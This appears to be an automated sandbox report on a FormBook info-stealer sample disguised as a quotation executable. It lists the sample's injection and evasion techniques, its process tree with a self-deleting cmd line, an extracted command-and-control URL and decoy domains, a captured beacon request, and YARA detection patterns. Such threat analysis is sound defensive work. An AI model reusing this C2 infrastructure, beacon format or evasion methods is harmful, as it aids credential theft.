
Windows Analysis Report: QUOTATION LIST FOR NEW ORDER.exe

Overview

General Information

Sample Name: QUOTATION LIST FOR NEW ORDER.exe
Analysis ID: 458798
MD5: 2a28a3e032a65c25b90f193621b623af
SHA1: 019659bb43b5535a9684d9938aa73e98682b0a61
SHA256: 317613289fb0cce8c301f63922883b30d54bbcdf1cb01bfa772244e03a07dfda
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • QUOTATION LIST FOR NEW ORDER.exe (PID: 5532 cmdline: 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe' MD5: 2A28A3E032A65C25B90F193621B623AF)
    • QUOTATION LIST FOR NEW ORDER.exe (PID: 4760 cmdline: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe MD5: 2A28A3E032A65C25B90F193621B623AF)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6056 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6068 cmdline: /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.appackersandmoversbengaluru.com/p4se/"], "decoy": ["weightlossforprofessionals.com", "talkotstopandshop.com", "everesttechsolutions.com", "garboarts.com", "esubastas-online.com", "electriclastmile.com", "tomio.tech", "jacoty.com", "knot-tied-up.com", "energychoicesim.com", "rocketcompaniessham.com", "madarasapattinam.com", "promosplace.com", "newstarchurch.com", "thesaleskitchen.com", "slingmodeinc.com", "jobresulthub.com", "pillclk.com", "shipu119.com", "sibalcar.com", "quotovate.com", "bluecoyotecontracting.com", "hc68kr.com", "laundry39.com", "vietthaivt.com", "ikonflorida.com", "xn--sm2b97e.com", "innovisional.co.uk", "spacecityscouples.com", "slmccallum.com", "hro41.com", "theyardcardzstore.com", "primewildlife.com", "xn--seranderturzm-ebc.com", "stilesandhansen.com", "bvlesty.com", "hejiayin.com", "philosophersdojo.com", "aworldofsofas.com", "itile.net", "unitronicdealers.com", "savasoguz.com", "magetu.info", "devgmor.com", "villasabai.com", "pipipenguin.com", "furnishessentials.com", "patchmonitoring.com", "michaelhumphriesrealestate.com", "pratikahealth.com", "caswellcu.com", "lakeportal.com", "weedyourmind.com", "cardamommm.com", "freshstartrestorationllcmd.com", "mastercardbhdleon.com", "ceramiccottageco.com", "magiczneszkielka.com", "casebookconnet.com", "recharge.directory", "phoneprivacyscreen.com", "mumbaindicator.com", "jumboprovacy.com", "streamerdojo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: QUOTATION LIST FOR NEW ORDER.exe, Virustotal: Detection: 61%
Source: QUOTATION LIST FOR NEW ORDER.exe, Metadefender: Detection: 37%
Source: QUOTATION LIST FOR NEW ORDER.exe, ReversingLabs: Detection: 63%
Yara detected FormBook
Source: Yara match, File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: QUOTATION LIST FOR NEW ORDER.exe, Joe Sandbox ML: detected
Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: QUOTATION LIST FOR NEW ORDER.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: QUOTATION LIST FOR NEW ORDER.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4x nop then pop ebx

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.appackersandmoversbengaluru.com/p4se/
Source: global traffic, HTTP traffic detected: GET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1; Host: www.everesttechsolutions.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View, ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View, ASN Name: SUDDENLINK-COMMUNICATIONSUS
Source: unknown, DNS traffic detected: queries for: www.everesttechsolutions.com
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261422144.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.agfamonotype.
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.335006943.0000000006870000.00000004.00000001.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247644835.00000000059F0000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.com
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.com-sQE1s/
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.comTC
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.comh-s
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com.TTF
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252430930.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253893243.00000000059CC000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253053283.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers6M
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253270152.00000000059F1000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers:
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersGN
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252531304.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersZ
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255121412.00000000059F1000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersb
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com9
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comF
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comW.TTFk
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252917416.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comY
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252701033.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.coma
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comals
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comalsd
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254519056.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comcomF
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253506597.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comcomd
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253137868.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comd
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comd3
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comd:
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comessed
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comessed3
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comldF
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.como
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252567447.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.como8
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comto
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.257287203.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.256992965.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/(
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.258690188.00000000059C8000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmO;
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/3
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/:
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/N
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Z
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/(
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/xS
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248396955.00000000059F2000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.comslnt
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255135599.00000000059FA000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.de
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255181502.00000000059FA000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.dej
Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE :: Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE :: Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE :: Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE :: Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY :: Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY :: Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
